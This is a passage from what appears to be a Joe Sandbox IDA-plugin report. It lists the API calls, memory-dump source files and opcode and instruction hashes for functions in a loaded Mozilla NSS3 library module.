LeaveCriticalSection.KERNEL32(?), ref: 6C678239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C678255
sqlite3_free.NSS3(00000000), ref: 6C678260

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: e7bb0eb49cf7aa514e5e59440fd7bb0d54dbd605e3b1c17ba6b080b0992923b8
Instruction ID: 93faa2e5df334e8f0b5f92607f7152cec59943e7a3ae8b4e48b7307e23c8d6ed
Opcode Fuzzy Hash: e7bb0eb49cf7aa514e5e59440fd7bb0d54dbd605e3b1c17ba6b080b0992923b8
Instruction Fuzzy Hash: CD91BE31A01208CBEB24DFE0E9587ADB7B1BF4A30DF14453AD41AAB660E7385C55CBE5

Function 6C751D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C751D8F

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C751DA6

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C751E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C751ED0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 4f7e63fdfbcf20143c4fa750a5ae67fe1830cdcd0948f108722000d3156c7a19
Instruction ID: f029a83661d0d31265eb1b8a06eb341b01b1ab4eeca210bf7c9b4f9fdb6b28f4
Opcode Fuzzy Hash: 4f7e63fdfbcf20143c4fa750a5ae67fe1830cdcd0948f108722000d3156c7a19
Instruction Fuzzy Hash: 7A517B75A00309CFDB10CF98C988BAEB7BABF4530AF548129D8199B751DB31E955CB90

Function 6C7A4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6885D2,00000000,?,?), ref: 6C7A4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7A500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7A50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7A50D6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 05622d112edbb0a1dc29647f9c8f28d8ab75e04fbf0273893bd199badc996d8f
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 1241C3B2A406058FCB18CF69DCD179AB7E1BF4431871D466DC84ACBB02E375E891CB81

Function 6C6CFFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C6CFDFE), ref: 6C6CFFAD

Part of subcall function 6C66CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6CF9C9,?,6C6CF4DA,6C6CF9C9,?,?,6C69369A), ref: 6C66CA7A
Part of subcall function 6C66CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C66CB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C6CFDFE), ref: 6C6CFFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C6CFDFE), ref: 6C6D001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C6CFDFE), ref: 6C6D006F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: 922bcf560b5aa81c888a2092a28ab7f662a0f02c4be69dafaa0962a37e62c2d6
Instruction ID: 52fc969026ddd6b215f218312bf906f3e05ff6a84162c2c887ceddac2a6ce069
Opcode Fuzzy Hash: 922bcf560b5aa81c888a2092a28ab7f662a0f02c4be69dafaa0962a37e62c2d6
Instruction Fuzzy Hash: 9441EE71F00205ABDB18EFA4E985AAE7770FB86318F054539D80693B01EB39A911CBE5

Function 6C753D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6C75127F,?), ref: 6C753D89

Part of subcall function 6C7506F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C752E70,00000000), ref: 6C750701

SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6C753DD3

Part of subcall function 6C7407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6E8298,?,?,?,6C6DFCE5,?), ref: 6C7407BF
Part of subcall function 6C7407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7407E6
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C74081B
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C740825

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error$HashLookupTableUtil$Alloc_ConstFind
String ID:
API String ID: 99596740-0
Opcode ID: d3cb94a5c083f7af55e486d7e6d2f42b40111757ef3c2ada24a8d4f5adce360e
Instruction ID: 89431f316123cd4f283d36f254a7794c22d9cdd206beda9ecbc0ed31f1baafaf
Opcode Fuzzy Hash: d3cb94a5c083f7af55e486d7e6d2f42b40111757ef3c2ada24a8d4f5adce360e
Instruction Fuzzy Hash: AB310535B0261497F71486199B45B5972A9AB4136CFE44636DE29C7FF1EF21EC3083C2

Function 6C7B7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B7E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B7EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B7EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C7B7ED8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 3a6c87e04c15bcd457011aa0ee66216022f546f879727fe167fcc0fce0fbe2e0
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: F931B5B1A001158FDB04CF18CD9599ABBE6FF8831871B8179D8586B711EB71EC45CBE1

Function 6C76DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C6F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C70AE42), ref: 6C6F30AA
Part of subcall function 6C6F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6F30C7
Part of subcall function 6C6F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6F30E5
Part of subcall function 6C6F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6F3116
Part of subcall function 6C6F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F312B
Part of subcall function 6C6F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C6F3154
Part of subcall function 6C6F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C76DBBD), ref: 6C76DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76DFEE

Part of subcall function 6C7086D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C708716
Part of subcall function 6C7086D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C708727
Part of subcall function 6C7086D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C70873B
Part of subcall function 6C7086D0: PR_Unlock.NSS3(?), ref: 6C70876F
Part of subcall function 6C7086D0: PR_SetError.NSS3(00000000,00000000), ref: 6C708787

Part of subcall function 6C72F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C72F854
Part of subcall function 6C72F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C72F868
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C72F882
Part of subcall function 6C72F820: free.MOZGLUE(04C483FF,?,?), ref: 6C72F889
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C72F8A4
Part of subcall function 6C72F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C72F8AB
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C72F8C9
Part of subcall function 6C72F820: free.MOZGLUE(280F10EC,?,?), ref: 6C72F8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C76DBBD), ref: 6C76DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C76DBBD), ref: 6C76E007

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: 1d9bbcdb34f200d118aeb40c41e206a5db3109d79a3f5b7830bcca3fc8c14dec
Instruction ID: a3d08d14523945bd047c6d60117162876fd1e173907b60a6121ae9271354a65e
Opcode Fuzzy Hash: 1d9bbcdb34f200d118aeb40c41e206a5db3109d79a3f5b7830bcca3fc8c14dec
Instruction Fuzzy Hash: 763125B0A0020157D7119A7AAE88ADBB3F8AF6530CF140135ED19D7F42FB21D919C7E6

Function 6C752C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C751289,?), ref: 6C752D72

Part of subcall function 6C753390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C752CA7,E80C76FF,?,6C751289,?), ref: 6C7533E9
Part of subcall function 6C753390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C75342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C751289,?), ref: 6C752D61

Part of subcall function 6C750B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C750B21
Part of subcall function 6C750B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C750B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C751289,?), ref: 6C752D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C751289,?), ref: 6C752DAF

Part of subcall function 6C70B8F0: PR_CallOnceWithArg.NSS3(6C842178,6C70BCF0,?), ref: 6C70B915
Part of subcall function 6C70B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C70B933
Part of subcall function 6C70B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C70B9C8
Part of subcall function 6C70B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C70B9E1

Part of subcall function 6C750A50: SECOID_GetAlgorithmTag_Util.NSS3(6C752A90,E8571076,?,6C752A7C,6C7521F1,?,?,?,00000000,00000000,?,?,6C7521DD,00000000), ref: 6C750A66

Part of subcall function 6C753310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C752D1E,?,?,?,?,00000000,?,?,?,?,?,6C751289), ref: 6C753348

Part of subcall function 6C7506F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C752E70,00000000), ref: 6C750701

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 84b4afae8c78d969a72c072fef820eece7496a4faeb086811392c9bda2ea225d
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: DB31B8B69003056BDB009E64EE4DA9A3765BF4522DF540130ED159B791EF31E938C7A2

Function 6C6E6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6E6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6E6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6E6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C808FE0), ref: 6C6E6CFE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 9ed84e774c4250881973562888da9f0c705cb1ab1a6318885167f9efcdebc318
Instruction ID: 8bcf4eefdaf8f6cf0087650b3cd8b8e0f84aebb5d4b87b939b387ffe455ad669
Opcode Fuzzy Hash: 9ed84e774c4250881973562888da9f0c705cb1ab1a6318885167f9efcdebc318
Instruction Fuzzy Hash: FC31A0B1A0521A9FDB08DF65C885ABFBBF5EF49248B10442EDA05D7750EB31D905CBA0

Function 6C7F4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C7F4F5D
free.MOZGLUE(?), ref: 6C7F4F74
free.MOZGLUE(?), ref: 6C7F4F82
GetLastError.KERNEL32 ref: 6C7F4F90

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 373e6e7e1ac3d34e517f7a752f7838f8a8e0b80529ee153768613f0bae376d80
Instruction ID: 2107342de4c0fa1785706d8835e5a7b0f94a3921c1405e2926753f5eb29ff526
Opcode Fuzzy Hash: 373e6e7e1ac3d34e517f7a752f7838f8a8e0b80529ee153768613f0bae376d80
Instruction Fuzzy Hash: E3315975A002194BEB01CB69DE85BDB73F8FF45348F080234E828A7381D734A906D691

Function 6C756DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C756E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C756E57

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C756E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C756EAA

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: ccf85ca214056a6c3c820004d401e63c179f5833f8af3be3c605fcdf83c3f07d
Instruction ID: 3188437d0ea7d1bf35bee6150188b73c63809ca95ba707a908a629011f9f30ff
Opcode Fuzzy Hash: ccf85ca214056a6c3c820004d401e63c179f5833f8af3be3c605fcdf83c3f07d
Instruction Fuzzy Hash: A031C331712512EEDB141F34DE08396B7A8BB1131AF94063CD899D6B51EF31A664CF81

Function 6C73DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C73DDB1,?,00000000), ref: 6C73DDF4

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C73DDB1,?,00000000), ref: 6C73DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C73DDB1,?,00000000), ref: 6C73DE17

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C73DE80

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 04ab480ec368849e39c1a4462fbd6b364a06e5fb86b41ce25894e54ce687edfc
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: EA31D6B1955B529BE700CF16D984652FBE8FFB5318B24D22AD81D87B42E770F4A4CB80

Function 6C72FE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C705ADC,?,00000000,00000001,?,?,00000000,?,6C6FBA55,?,?), ref: 6C72FE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72FE5F
PR_Unlock.NSS3(78831D74), ref: 6C72FEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C72FED6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 729363541615c134ab4f378c722ccc822584503d62a4c33f35c8629b2ec2c23b
